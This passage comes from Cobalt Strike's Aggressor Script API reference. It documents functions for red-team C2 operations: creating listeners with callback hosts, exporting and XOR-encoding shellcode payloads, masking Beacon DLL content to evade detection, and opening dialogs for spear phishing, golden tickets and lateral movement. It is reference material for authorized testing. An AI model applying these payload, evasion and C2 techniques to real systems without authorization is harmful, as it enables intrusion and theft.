closeClient();

colorPanel

Generate a Java component to set accent colors within Cobalt Strike's data model

Arguments

$1 - the prefix

$2 - an array of IDs to change colors for

Example

popup targets {
   menu "&Color" {
      insert_component(colorPanel("targets", $1));
   }
}
See also

&highlight

credential_add

Add a credential to the data model

Arguments

$1 - username

$2 - password

$3 - realm

$4 - source

$5 - host

Example

command falsecreds {
   for ($x = 0; $x < 100; $x++) {
      credential_add("user $+ $x", "password $+ $x");
   }
}

credentials

Returns a list of application credentials in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each credential entry.

Example

printAll(credentials());

data_keys

List the query-able keys from Cobalt Strike's data model

Returns

A list of keys that you may query with &data_query

Example

foreach $key (data_keys()) {
   println("\n\c4=== $key ===\n");
   println(data_query($key));
}

data_query

Queries Cobalt Strike's data model

Arguments

$1 - the key to pull from the data model

Returns

A Sleep representation of the queried data.

Example

println(data_query("targets"));

dbutton_action

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.

Arguments

$1 - the $dialog object

$2 - the button label

Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

dbutton_help

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.

Arguments

$1 - the $dialog object

$2 - the URL to go to

Example

dbutton_help($dialog, "http://www.google.com");

dialog

Create a dialog. Use &dialog_show to show it.

Arguments

$1 - the title of the dialog

$2 - a %dictionary mapping row names to default values

$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.

Returns

A scalar with a $dialog object.

Example

sub callback {
   # prints: Pressed Go, a is: Apple
   println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

dialog_description

Adds a description to a &dialog

Arguments

$1 - a $dialog object

$2 - the description of this dialog

Example

dialog_description($dialog, "I am the Hello World dialog.");

dialog_show

Shows a &dialog.

Arguments

$1 - the $dialog object

Example

dialog_show($dialog);

dispatch_event

Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.

Arguments

$1 - the function to call

Example

dispatch_event({
   println("Hello World"); 
});

downloads

Returns a list of downloads in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each downloaded file.

Example

printAll(downloads());

drow_beacon

Adds a beacon selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_beacon($dialog, "bid", "Session: ");

drow_checkbox

Adds a checkbox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - the text next to the checkbox

Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

drow_combobox

Adds a combobox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - an array of options to choose from

Example

drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

drow_exploits

Adds a privilege escalation exploit selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_exploits($dialog, "exploit", "Exploit: ");

drow_file

Adds a file chooser row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_file($dialog, "file", "Choose: ");

drow_interface

Adds a VPN interface selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_interface($dialog, "int", "Interface: ");

drow_krbtgt

Adds a krbtgt selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_krbtgt($dialog, "hash", "krbtgt hash: ");

drow_listener

Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener($dialog, "listener", "Listener: ");

drow_listener_smb

DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage

drow_listener_stage

Adds a listener selection row to a &dialog. This row shows all Beacon and Foreign listener payloads.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener_stage($dialog, "listener", "Stage: ");

drow_mailserver

Adds a mail server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_mailserver($dialog, "mail", "SMTP Server: ");

drow_proxyserver

DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.

Adds a proxy server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_proxyserver($dialog, "proxy", "Proxy: ");

drow_site

Adds a site/URL field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_site($dialog, "url", "Site: ");

drow_text

Adds a text field row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - Optional. The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).

Example

drow_text($dialog, "name", "Name: ");

drow_text_big

Adds a multi-line text field to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_text_big($dialog, "addr", "Address: ");

dstamp

Format a time into a date/time value. This value includes seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . dstamp(ticks()));
See also

&tstamp

elog

Publish a notification to the event log

Arguments

$1 - the message

Example

elog("The robot invasion has begun!");

encode

Obfuscate a position-independent blob of code with an encoder.

Arguments

$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to

$2 - the encoder to use

$3 - the architecture (e.g., x86, x64)

Encoder Description
alpha Alphanumeric encoder (x86-only)
xor XOR encoder

Notes

  • The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
  • alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.

Returns

A position-independent blob that decodes the original string and passes execution to it.

Example

# generate shellcode for a listener
$stager = shellcode("my listener", false "x86");

# encode it.
$stager = encode($stager, "xor", "x86");

extract_reflective_loader

Extract the executable code for a reflective loader from a Beacon Object File (BOF).

Arguments

$1 - Beacon Object File data that contains a reflective loader.

Returns

The Reflective Loader binary executable code extracted from the Beacon Object File data.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# extract loader from BOF.
# ---------------------------------------------------------------------
$loader = extract_reflective_loader($data);

file_browser

Open the File Browser. This function does not have any parameters.

fireAlias

Runs a user-defined alias

Arguments

$1 - the beacon id to run the alias against

$2 - the alias name to run

$3 - the arguments to pass to the alias.

Example

# run the foo alias when a new Beacon comes in
on beacon_initial {
   fireAlias($1, "foo", "bar!");
}

fireEvent

Fire an event.

Arguments

$1 - the event name

... - the event arguments.

Example

on foo {
   println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

format_size

Formats a number into a size (e.g., 1024 => 1kb)

Arguments

$1 - the size to format

Returns

A string representing a human readable data size.

Example

println(format_size(1024));

getAggressorClient

Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.

Example

$client = getAggressorClient();

gunzip

Decompress a string (GZIP).

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip de-compressor

Example

println(gunzip(gzip("this is a test")));
See also

&gzip

gzip

GZIP a string.

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip compressor

Example

println(gzip("this is a test"));
See also

&gunzip

highlight

Insert an accent (color highlight) into Cobalt Strike's data model

Arguments

$1 - the data model

$2 - an array of rows to highlight

$3 - the accent type

Notes

  • Data model rows include: applications, beacons, credentials, listeners, services, and targets.
  • Accent options are:
Accent Color
[empty] no highlight
good Green
bad Red
neutral Yellow
ignore Grey
cancel Dark Blue

Example

command admincreds {
   local('@creds');
   
   # find all of our creds that are user Administrator.
   foreach $entry (credentials()) {
      if ($entry['user'] eq "Administrator") {
         push(@creds, $entry);
      }
   }
   
   # highlight all of them green!
   highlight("credentials", @creds, "good");
}

host_delete

Delete a host from the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

Example

# clear all hosts
host_delete(hosts());

host_info

Get information about a target.

Arguments

$1 - the host IPv4 or IPv6 address

$2 - [Optional] the key to extract a value for

Returns

%info = host_info("address");

Returns a dictionary with known information about this target.

$value = host_info("address", "key");

Returns the value for the specified key from this target's entry in the data model.

Example

# create a script console alias to dump host info
command host {
   println("Host $1");
   foreach $key => $value (host_info($1)) {
      println("$[15]key $value");
   }
}

host_update

Add or update a host in the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

$2 - the DNS name of this target

$3 - the target's operating system

$4 - the operating system version number (e.g., 10.0)

$5 - a note for the target.

Note

You may specify a $null value for any argument and, if the host exists, no change will be made to that value.

Example

host_update("192.168.20.3", "DC", "Windows", 10.0);

hosts

Returns a list of IP addresses from Cobalt Strike's target model

Returns

An array of IP addresses

Example

printAll(hosts());

insert_component

Add a javax.swing.JComponent object to the menu tree

Arguments

$1 - the component to add

insert_menu

Bring menus associated with a popup hook into the current menu tree.

Arguments

$1 - the popup hook

... - additional arguments are passed to the child popup hook.

Example

popup beacon {
   # menu definitions above this point
   
   insert_menu("beacon_bottom", $1);
   
   # menu definitions below this point
}

iprange

Generate an array of IPv4 addresses based on a string description

Arguments

$1 - a string with a description of IPv4 ranges

Range Result
192.168.1.2 The IP4 address 192.168.1.2
192.168.1.1, 192.168.1.2 The IPv4 addresses 192.168.1.1 and 192.168.1.2
192.168.1.0/24 The IPv4 addresses 192.168.1.0 through 192.168.1.255
192.168.1.18-192.168.1.30 The IPv4 addresses 192.168.1.18 through 192.168.1.29
192.168.1.18-30 The IPv4 addresses 192.168.1.18 through 192.168.1.29

Returns

An array of IPv4 addresses within the specified ranges.

Example

printAll(iprange("192.168.1.0/25"));

keystrokes

Returns a list of keystrokes from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about recorded keystrokes.

Example

printAll(keystrokes());

licenseKey

Get the license key for this instance of Cobalt Strike

Returns

Your license key.

Example

println("Your key is: " . licenseKey());

listener_create

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - the listener host

$4 - the listener port

$5 - a comma separated list of addresses for listener to beacon to

Example

# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", 
      "ads.losenolove.com", 443);

# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
      "www.losenolove.com", 80, 
      "www.losenolove.com, www2.losenolove.com");

listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - a map with key/value pairs that specify options for the listener

Note

The following payload options are valid for $2:

Payload Type
windows/beacon_dns/reverse_dns_txt Beacon DNS
windows/beacon_http/reverse_http Beacon HTTP
windows/beacon_https/reverse_https Beacon HTTPS
windows/beacon_bind_pipe Beacon SMB
windows/beacon_bind_tcp Beacon TCP
windows/beacon_extc2 External C2
windows/foreign/reverse_http Foreign HTTP
windows/foreign/reverse_https Foreign HTTPS

The following keys are valid for $3:

Key DNS HTTP/S SMB TCP (Bind)
althost HTTP Host Header
bindto bind port bind port
beacons c2 hosts c2 hosts bind host
host staging host staging host
maxretry maxretry maxretry    
port c2 port c2 port pipe name port
profile profile variant
proxy proxy config
strategy host rotation host rotation

The following host rotation Values are valid for the 'strategy' Key:

Option
round-robin
random
failover
failover-5x
failover-50x
failover-100x
failover-1m
failover-5m
failover-15m
failover-30m
failover-1h
failover-3h
failover-6h
failover-12h
failover-1d
rotate-1m
rotate-5m
rotate-15m
rotate-30m
rotate-1h
rotate-3h
rotate-6h
rotate-12h
rotate-1d

Note

The maxretry value uses the following syntax of exit-[max_attempts]-[increase_attempts]-[duration][m,h,d]. For example 'exit-10-5-5m' will exit beacon after 10 failed attempts and will increase sleep time after 5 failed attempts to 5 minutes. The sleep time will not be updated if the current sleep time is greater than the specified duration value. The sleep time will be affected by the current jitter value. On a successful connection the failed attempts count will be reset to zero and the sleep time will be reset to the prior value.

The proxy configuration string is the same string you would input into Cobalt Strike's listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior.

Example

# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
      %(host => "ads.losenolove.com", port => 443));

# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
      %(host => "www.losenolove.com", port => 80, 
      beacons => "www.losenolove.com, www2.losenolove.com"));

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      max_retry => "exit-10-5-5m",
      proxy => "proxy.host"));

listener_delete

Stop and remove a listener.

Arguments

$1 - the listener name

Example

listener_delete("Beacon HTTP");

listener_describe

Describe a listener.

Arguments

$1 - the listener name

$2 - [Optional] the remote target the listener is destined for

Returns

A string describing the listener

Example

foreach $name (listeners()) {
   println("$name is: " . listener_describe($name));
}

listener_info

Get information about a listener.

Arguments

$1 - the listener name

$2 - [Optional] the key to extract a value for

Returns

%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.

$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener's metadata

Example

# create a script console alias to dump listener info
command dump {
   println("Listener $1");
   foreach $key => $value (listener_info($1)) {
      println("$[15]key $value");
   }
}

listener_pivot_create

Create a new pivot listener.

Arguments

$1 - the Beacon ID

$2 - the listener name

$3 - the payload (e.g., windows/beacon_reverse_tcp)

$4 - the listener host

$5 - the listener port

Note

The only valid payload argument is windows/beacon_reverse_tcp.

Example

# create a pivot listener: 
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
   local('$lhost $bid $name $port');
   
   # extract our arguments
   ($bid, $name, $port) = @_;
   
   # get the name of our target
   $lhost = beacon_info($1, "computer");
   
   btask($1, "create TCP listener on $lhost $+ : $+ $port");
   listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

listener_restart

Restart a listener

Arguments

$1 - the listener name

Example

listener_restart("Beacon HTTP");

listeners

Return a list of listener names (with stagers only!) across all team servers this client is connected to.

Returns

An array of listener names.

Example

printAll(listeners());

listeners_local

Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.

Returns

An array of listener names.

Example

printAll(listeners_local());

listeners_stageless

Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they're not actionable via staging or exporting as a Reflective DLL).

Returns

An array of listener names.

Example

printAll(listeners_stageless());

localip

Get the IP address associated with the team server.

Returns

A string with the team server's IP address.

Example

println("I am: " . localip());

menubar

Add a top-level item to the menubar.

Arguments

$1 - the description

$2 - the popup hook

Example

popup mythings {
   item "Keep out" {
   }
}

menubar("My &Things", "mythings");

mynick

Get the nickname associated with the current Cobalt Strike client.

Returns

A string with your nickname.

Example

println("I am: " . mynick());

nextTab

Activate the tab that is to the right of the current tab.

Example

bind Ctrl+Right {
   nextTab();
}

on

Register an event handler. This is an alternate to the on keyword.

Arguments

$1 - the name of the event to respond to

$2 - a callback function. Called when the event happens.

Example

sub foo {
   blog($1, "Foo!");
}

on("beacon_initial", &foo);

openAboutDialog

Open the "About Cobalt Strike" dialog

Example

openAboutDialog();

openApplicationManager

Open the application manager (system profiler results) tab.

Example

openApplicationManager();

openAutoRunDialog

REMOVED Removed in Cobalt Strike 4.0.

openBeaconBrowser

Open the beacon browser tab.

Example

openBeaconBrowser();

openBeaconConsole

Open the console to interact with a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Interact" {
   local('$bid');
   foreach $bid ($1) {
      openBeaconConsole($bid);
   }
}

openBrowserPivotSetup

open the browser pivot setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browser Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openBrowserPivotSetup($bid);
   }
}

openBypassUACDialog

REMOVED Removed in Cobalt Strike 4.1.

openCloneSiteDialog

Open the dialog for the website clone tool.

Example

openCloneSiteDialog();

openConnectDialog

Open the connect dialog.

Example

openConnectDialog();

openCovertVPNSetup

open the Covert VPN setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "VPN Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openCovertVPNSetup($bid);
   }
}

openCredentialManager

Open the credential manager tab.

Example

openCredentialManager();

openDefaultShortcutsDialog

Open the Default Keyboard Shortcuts dialog. This function does not have any parameters.

openDownloadBrowser

Open the download browser tab

Example

openDownloadBrowser();

openElevateDialog

Open the dialog to launch a privilege escalation exploit.

Arguments

$1 - the beacon ID

Example

item "Elevate" {
   local('$bid');
   foreach $bid ($1) {
      openElevateDialog($bid);
   }
}

openEventLog

Open the event log.

Example

openEventLog();

openFileBrowser

Open the file browser for a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browse Files" {
   local('$bid');
   foreach $bid ($1) {
      openFileBrowser($bid);
   }
}

openGoldenTicketDialog

open a dialog to help generate a golden ticket

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Golden Ticket" {
   local('$bid');
   foreach $bid ($1) {
      openGoldenTicketDialog($bid);
   }
}

openHTMLApplicationDialog

Open the HTML Application Dialog.

Example

openHTMLApplicationDialog();

openHostFileDialog

Open the host file dialog.

Example

openHostFileDialog();

openInterfaceManager

Open the tab to manage Covert VPN interfaces

Example

openInterfaceManager();

openJavaSignedAppletDialog

Open the Java Signed Applet dialog

Example

openJavaSignedAppletDialog();

openJavaSmartAppletDialog

Open the Java Smart Applet dialog

Example

openJavaSmartAppletDialog();

openJumpDialog

Open Cobalt Strike's lateral movement dialog

Arguments

$1 - the type of lateral movement. See &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.

$2 - an array of targets to apply this action against

Example

openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

openKeystrokeBrowser

Open the keystroke browser tab

Example

openKeystrokeBrowser();

openListenerManager

Open the listener manager

Example

openListenerManager();

openMakeTokenDialog

open a dialog to help generate an access token

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Make Token" {
   local('$bid');
   foreach $bid ($1) {
      openMakeTokenDialog($bid);
   }
}

openMalleableProfileDialog

Open the malleable C2 profile dialog.

Example

openMalleableProfileDialog();

openOfficeMacro

Open the office macro export dialog

Example

openOfficeMacroDialog();

openOneLinerDialog

Open the dialog to generate a PowerShell one-liner for this specific Beacon session.

Arguments

$1 - the beacon ID

Example

item "&One-liner" {
   openOneLinerDialog($1);
}

openOrActivate

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.

Arguments

$1 - the Beacon ID

Example

item "&Activate" {
   local('$bid');
   foreach $bid ($1) {
      openOrActivate($bid);
   }
}

openPayloadGeneratorDialog

Open the Payload Generator dialog.

Example

openPayloadGeneratorDialog();

openPayloadHelper

Open a payload chooser dialog.

Arguments

$1 - a callback function. Arguments: $1 - the selected listener.

Example

openPayloadHelper(lambda({
   bspawn($bid, $1);
}, $bid => $1));

openPivotListenerSetup

open the pivot listener setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Listener..." {
   local('$bid');
   foreach $bid ($1) {
      openPivotListenerSetup($bid);
   }
}

openPortScanner

Open the port scanner dialog

Arguments

$1 - an array of targets to scan

Example

openPortScanner(@("192.168.1.3"));

openPortScannerLocal

Open the port scanner dialog with options to target a Beacon's local network

Arguments

$1 - the beacon to target with this feature

Example

item "Scan" {
   local('$bid');
   foreach $bid ($1) {
      openPortScannerLocal($bid);
   }
}

openPowerShellWebDialog

Open the dialog to setup the PowerShell Web Delivery Attack

Example

openPowerShellWebDialog();

openPreferencesDialog

Open the preferences dialog

Example

openPreferencesDialog();

openProcessBrowser

Open a process browser for one or more Beacons

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Processes" {
   openProcessBrowser($1);
}

openSOCKSBrowser

Open the tab to list SOCKS proxy servers

Example

openSOCKSBrowser();

openSOCKSSetup

open the SOCKS proxy server setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "SOCKS Server" {
   local('$bid');
   foreach $bid ($1) {
      openSOCKSSetup($bid);
   }
}

openScreenshotBrowser

Open the screenshot browser tab

Example

openScreenshotBrowser();

openScriptConsole

Open the Aggressor Script console.

Example

openScriptConsole();

openScriptManager

Open the tab for the script manager.

Example

openScriptManager();

openScriptedWebDialog

Open the dialog to setup a Scripted Web Delivery Attack

Example

openScriptedWebDialog();

openServiceBrowser

Open service browser dialog

Arguments

$1 - an array of targets to show services for

Example

openServiceBrowser(@("192.168.1.3"));

openSiteManager

Open the site manager.

Example

openSiteManager();

openSpawnAsDialog

Open dialog to spawn a payload as another user

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Spawn As..." {
   local('$bid');
   foreach $bid ($1) {
      openSpawnAsDialog($bid);
   }
}

openSpearPhishDialog

Open the dialog for the spear phishing tool.

Example

openSpearPhishDialog();

openSystemInformationDialog

Open the system information dialog.

Example

openSystemInformationDialog();

openSystemProfilerDialog

Open the dialog to setup the system profiler.

Example

openSystemProfilerDialog();

openTargetBrowser

Open the targets browser

Example

openTargetBrowser();

openWebLog

Open the web log tab.

Example

openWebLog();

openWindowsDropperDialog

REMOVED Removed in Cobalt Strike 4.0.

openWindowsExecutableDialog

Open the dialog to generate a Windows executable.

Example

openWindowsExecutableDialog();

openWindowsExecutableStage

Open the dialog to generate a stageless Windows executable.

Example

openWindowsExecutableStage();

openWindowsExecutableStageAllDialog

Open the dialog to generate all of the stageless payloads (in x86 and x64) for all of the configured listeners. This dialog can also be found in the UI menu under Payloads -> Windows Stageless Generate all Payloads.

Example

openWindowsExecutableStageAllDialog();

payload

Exports a raw payload for a specific Cobalt Strike listener.

Arguments

$1 - the listener name

$2 - x86|x64 the architecture of the payload

$3 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$4 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload("my listener", "x86", "process", "Direct");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

payload_bootstrap_hint

Get the offset to function pointer hints used by Beacon's Reflective Loader. Populate these hints with the asked-for process addresses to have Beacon load itself into memory in a more OPSEC-safe way.

Arguments

$1 - the payload position-independent code (specifically, Beacon)

$2 - the function to get the patch location for

Notes

  • Cobalt Strike's Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon's Reflective Loader. The protocol is to patch the location of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32's Export Address Table. This protocol is optional. Artifacts that don't follow this protocol will fallback to resolving key functions via the Export Address Table.
  • The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.

Returns

The offset to a memory location to patch with a pointer for a specific function used by Beacon's Reflective Loader.

payload_local

Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session's metadata.

Arguments

$1 - the parent Beacon session ID

$2 - the listener name

$3 - x86|x64 the architecture of the payload

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload_local($bid, "my listener", "x86", "process", "None");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

pe_insert_rich_header

Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.

Arguments

$1 - Beacon DLL content

$2 - Rich header

Returns

Updated DLL Content

Note

The rich header length should be on a 4 byte boundary for subsequent checksum calculations.

Example

# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);

pe_mask

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Length to mask

$4 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {

   local('$temp_dll, $start, $length, $maskkey');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $start = parseNumber(@loc_en[0], 10);
   $length = 4;
   $maskkey = 22;

   # -------------------------------------
   # mask some data in a dll
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_mask_section

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Section name

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {

   local('$temp_dll, $section_name, $maskkey');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $section_name = ".text";
   $maskkey = 23;

   # -------------------------------------
   # mask a section in a dll
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   # $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_mask_string

Mask a string in the Beacon DLL Content based on position.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {

   local('$temp_dll, $location, $length, $maskkey');
   local('%pemap');
   local('@loc);

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $location = @loc[0];
   $length = 5;
   $maskkey = 23;

   # -------------------------------------
   # pe_mask_string (mask a string in a dll)
   # -------------------------------------
   # warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
   $temp_dll = pe_mask_string($temp_dll, $location, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # we are unmasking the length of the string and the null character
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_patch_code

Patch code in the Beacon DLL Content based on find/replace in '.text' section'.

Arguments

$1 - Beacon DLL content

$2 - byte array to find for resolve offset

$3 - byte array place at resolved offset (overwrite data)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content

# ===========================================================================
sub demo_pe_patch_code {

   local('$temp_dll, $findme, $replacement');

   $temp_dll = $1;

   # ====== simple text values ======
   $findme = "abcABC123";
   $replacement = "123ABCabc";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # ====== byte array as a hex string ======
   $findme = "\x01\x02\x03\xfc\xfe\xff";
